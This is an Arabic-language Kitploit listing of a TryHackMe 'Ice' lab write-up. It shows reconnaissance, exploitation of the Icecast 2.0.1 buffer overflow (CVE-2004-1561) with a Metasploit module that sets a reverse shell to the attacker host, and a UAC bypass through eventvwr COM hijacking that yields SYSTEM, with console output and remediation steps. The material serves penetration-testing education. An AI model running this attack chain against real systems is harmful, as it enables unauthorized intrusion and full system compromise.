Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
thm-ice-icecast-rce-privesc — اختراق كامل لجهاز Ice الخاص بـ TryHackMe — استغلال ثغرة Icecast 2.0.1 RCE (CVE-2004-1561) عبر تجاوز سعة المخزن المؤقت، متبوعًا برفع الامتيازات في ويندوز من خلال تجاوز UAC / اختطاف COM. يتضمن منهجية مفصلة وإجراءات معالجة. | Kitploit
أدوات/GitHubGitHub/monseigneurpatas/thm-ice-icecast-rce-privesc
تصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالCTFاختبار الاختراقالتعلم والتعليماستغلال الملفات الثنائية

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
monseigneurpatas/thm-ice-icecast-rce-privesc

thm-ice-icecast-rce-privesc

اختراق كامل لجهاز Ice الخاص بـ TryHackMe — استغلال ثغرة Icecast 2.0.1 RCE (CVE-2004-1561) عبر تجاوز سعة المخزن المؤقت، متبوعًا برفع الامتيازات في ويندوز من خلال تجاوز UAC / اختطاف COM. يتضمن منهجية مفصلة وإجراءات معالجة.

عرض المستودع
2منذ 2 أشهرلم تتم المراجعة بعد

TryHackMe — Ice: ثغرة تنفيذ التعليمات عن بعد في Icecast 2.0.1 وتصعيد الصلاحيات في ويندوز

المنصة: TryHackMe نظام التشغيل المستهدف: Windows 7 / Windows Server 2008 R2 الصعوبة: سهل الفئة: تجاوز سعة المخزن المؤقت (تنفيذ التعليمات عن بعد)، تصعيد الصلاحيات المحلي


ملخص

يُوثق هذا التقرير الاختراق الكامل لجهاز Ice على منصة TryHackMe، بدءًا من الاستطلاع الأولي وحتى تصعيد الصلاحيات إلى مستوى SYSTEM. يكشف الهدف عن خادم وسائط دفق Icecast 2.0.1 قديم معرض لثغرة تجاوز سعة المخزن المؤقت عن بعد (CVE-2004-1561) تسمح بتنفيذ تعليمات عشوائية عبر رؤوس HTTP مُعدة. تم الحصول على الوصول الأولي كمستخدم منخفض الصلاحيات عبر شل عكسية من Meterpreter. ثم تم تحقيق تصعيد الصلاحيات إلى NT AUTHORITY\SYSTEM عن طريق إساءة استخدام ثغرة اختطاف كائن COM في ويندوز (bypassuac_eventvwr) والتي تستغل ملفات ثنائية ذاتية التصعيد وإعادة توجيه مفاتيح التسجيل تحت HKCU.

المرحلةالتقنيةالنتيجة
الاستطلاعarp-scan, nmapتحديد الهدف + 7 منافذ مفتوحة
الوصول الأوليتجاوز سعة المخزن المؤقت لرأس HTTP في Icecast (CVE-2004-1561)جلسة Meterpreter كمستخدم محلي
تصعيد الصلاحياتbypassuac_eventvwr (اختطاف COM/التسجيل)شل SYSTEM

1. الاستطلاع

1.1 اكتشاف الهدف

تم استخدام مسح ARP لتحديد عنوان IP للهدف على الشبكة المحلية.

root@kitploit:~
arp-scan -l

نتائج مسح ARP و Nmap

تم تحديد الهدف على 192.168.37.138.

1.2 تعداد المنافذ والخدمات

تم إجراء مسح SYN كامل مع كشف الخدمة/الإصدار على الهدف:

root@kitploit:~
nmap -sS -sV 192.168.37.138

النتائج:

تم التعرف على الhost باسم DARK-PC، وهو جهاز ويندوز. برز المنفذ 8000 الذي يعمل عليه Icecast كأكثر سطح هجوم واعد — فهو ليس خدمة ويندوز قياسية ومن المعروف أنه يحمل ثغرات CVE تاريخية.


2. تحديد الثغرات

أسفر البحث عن ثغرات Icecast المعروفة عن CVE-2004-1561:

تجاوز سعة المخزن المؤقت في Icecast 2.0.1 والإصدارات السابقة يسمح للمهاجمين عن بعد بتنفيذ تعليمات عشوائية عبر طلب HTTP يحتوي على عدد كبير من الرؤوس.

تم تأكيد وجود وحدة Metasploit مطابقة:

root@kitploit:~
search CVE-2004-1561

البحث عن CVE في Metasploit

root@kitploit:~
exploit/windows/http/icecast_header   2004-09-28   great   No   Icecast Header Overwrite

3. الاستغلال — الوصول الأولي

3.1 السبب الجذري

يفشل Icecast 2.0.1 في التحقق بشكل صحيح من حدود عدد رؤوس HTTP التي يعالجها. بإرسال رؤوس أكثر مما يمكن لمخزن الخادم المؤقت استيعابه، يفيض البيانات الزائدة إلى الذاكرة المجاورة، مما يؤدي إلى استبدال البيانات خارج المخزن المؤقت المخصص لتحليل الرؤوس.

على وجه التحديد، يؤدي الفيضان إلى إفساد عنوان العودة المحفوظ (EIP) في المكدس — وهو العنوان الذي يعود إليه وحدة المعالجة المركزية بمجرد أن تعود الدالة المعالجة للطلب. من خلال التحكم في هذا العنوان، يمكن للمهاجم إعادة توجيه التنفيذ إلى shellcode المقدم من المهاجم بدلاً من نقطة العودة الشرعية، مما يؤدي إلى تنفيذ تعليمات عشوائية في سياق عملية Icecast.

3.2 تكوين الوحدة

root@kitploit:~
use exploit/windows/http/icecast_header
set RHOSTS 192.168.37.138
set RPORT 8000
set LHOST 192.168.37.133
set LPORT 4444

خيارات الاستغلال والتشغيل الناجح

3.3 التنفيذ

root@kitploit:~
exploit
root@kitploit:~
[*] Started reverse TCP handler on 192.168.37.133:4444
[*] Sending stage (177734 bytes) to 192.168.37.138
[*] Meterpreter session 1 opened (192.168.37.133:4444 -> 192.168.37.138:49181)

تم إنشاء جلسة Meterpreter كمستخدم منخفض الصلاحيات.


4. تصعيد الصلاحيات

4.1 مقتَرح الاستغلال المحلي

مع وجود جلسة نشطة، تم استخدام أداة الاقتراح المدمجة في Metasploit لتحديد مسارات تصعيد الصلاحيات المحلية الممكنة لمستوى التحديثات للهدف:

root@kitploit:~
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

نتائج مقتَرح الاستغلال المحلي

تم الإشارة إلى عدة وحدات كمرشحة محتملة، بما في ذلك bypassuac_eventvwr، التي تستهدف أجهزة Windows 7 / Server 2008 R2 غير المُصحّحة.

4.2 السبب الجذري — تجاوز UAC عبر اختطاف COM

يستغل مسار تصعيد الصلاحيات هذا بنية COM (نموذج الكائنات المكونة) في ويندوز، والذي يسمح للمكونات المكتوبة بلغات مختلفة بالتفاعل. تعتمد كائنات COM عادةً على مكتبات DLL مشتركة، ويحدد النظام أي DLL يتم تحميله لكائن COM معين عبر مسارات التسجيل — بما في ذلك المسارات المخزنة تحت خلية HKCU للمستخدم الحالي.

eventvwr.exe هو ملف ثنائي ويندوز ذاتي التصعيد (يُفعّل بشكل صامت موجه تصعيد UAC دون إظهار الموجه نفسه، بسبب إعدادات البيان الخاص به، في تكوينات UAC الافتراضية). عند تشغيله، يستعلم عن HKCU لحل كائن COM وتحميل الـ DLL المرتبط به.

يختطف الاستغلال هذا الاستعلام: يكتب مفتاح تسجيل ضار تحت خلية HKCU للمستخدم الحالي، مشيرًا إلى حل COM نحو حمولة يتحكم بها المهاجم بدلاً من DLL النظام الشرعي. نظرًا لأن eventvwr.exe ذاتي التصعيد، فإن الحمولة التي يُفعّلها — في هذه الحالة شل أوامر — تُنفّذ بمستوى التكامل الذي يصعد إليه eventvwr.exe، مما يرفع الجلسة من مستخدم عادي إلى سياق ذي صلاحيات أعلى، دون إظهار موجه UAC مرئي.

4.3 التنفيذ

root@kitploit:~
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
set LHOST 192.168.37.133
set LPORT 4444
exploit

نجاح استغلال تصعيد الصلاحيات

root@kitploit:~
[*] UAC is enabled, checking level...
[+] Part of Administrators group! Continuing...
[*] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[*] Meterpreter session 2 opened (192.168.37.133:4444 -> 192.168.37.138:49180)
[*] Cleaning up registry keys ...

C:\Windows\system32>

تم فتح جلسة Meterpreter ثانية مع شل مرتفع الصلاحيات، مباشرة في C:\Windows\system32، مما يؤكد تصعيد الصلاحيات.


5. ملخص النتائج

#النتيجةالخطورةCVE / المرجع

6. الإصلاح

  1. تصحيح أو استبدال Icecast. الإصدار 2.0.1 قديم جدًا بأكثر من عقدين؛ قم بالترقية إلى أحدث إصدار مدعوم أو أوقف الخدمة إذا كانت غير مستخدمة.
  2. تقييد التعرض لخدمات البث/الوسائط على الشبكات الداخلية فقط — لا ينبغي أن تكون قابلة للوصول عبر الإنترنت أو الشبكة المحلية بدون حاجة تجارية واضحة.
  3. تطبيق تحديثات ويندوز الحالية. تم إصلاح إساءة استخدام التصعيد الذاتي لـ eventvwr.exe في إصدارات ويندوز اللاحقة؛ هذا الهجوم لا يعمل ضد إصدارات ويندوز الحديثة المحدثة بالكامل.
  4. تشديد إعدادات UAC إلى "الإعلام دائمًا" بدلاً من المستوى الافتراضي، مما يغلق عدة مسارات لإساءة استخدام التصعيد الذاتي الصامت.
  5. مبدأ أقل الامتيازات: لا ينبغي أن يكون الحساب المخترق جزءًا من مجموعة المسؤولين المحليين، وهو ما سمح لتقنية تجاوز UAC بالنجاح في المقام الأول.

الأدوات المستخدمة

  • arp-scan, nmap — استطلاع
  • Metasploit Framework (msfconsole) — استغلال وما بعد الاستغلال
  • Meterpreter — شل ما بعد الاستغلال

المهارات المُظهرة

  • الاستطلاع الشبكي وتعداد الخدمات
  • البحث عن CVE وربط الاستغلال بالثغرات
  • مفاهيم استغلال تلف الذاكرة / تجاوز سعة المخزن المؤقت (الكتابة فوق EIP)
  • أساسيات ويندوز: حل كائنات COM، اختطاف التسجيل، آليات تجاوز UAC
  • توثيق سلسلة الهجوم الكاملة (استطلاع → استغلال → تصعيد صلاحيات → إصلاح)
تنزيل الأداة
المنفذالخدمةالإصدار
135/tcpmsrpcMicrosoft Windows RPC
139/tcpnetbios-ssnMicrosoft Windows netbios-ssn
445/tcpmicrosoft-dsWindows 7–10 (workgroup: WORKGROUP)
5357/tcphttpMicrosoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8000/tcphttpخادم وسائط الدفق Icecast
49152–49157/tcpmsrpcMicrosoft Windows RPC
1تجاوز سعة المخزن المؤقت لرأس HTTP في Icecast 2.0.1 يؤدي إلى تنفيذ تعليمات عن بعدحرجCVE-2004-1561
2تجاوز UAC عبر اختطاف COM/التسجيل (التصعيد الذاتي لـ eventvwr.exe)عالينقطة ضعف معروفة في تصميم UAC في Windows 7/Server 2008 R2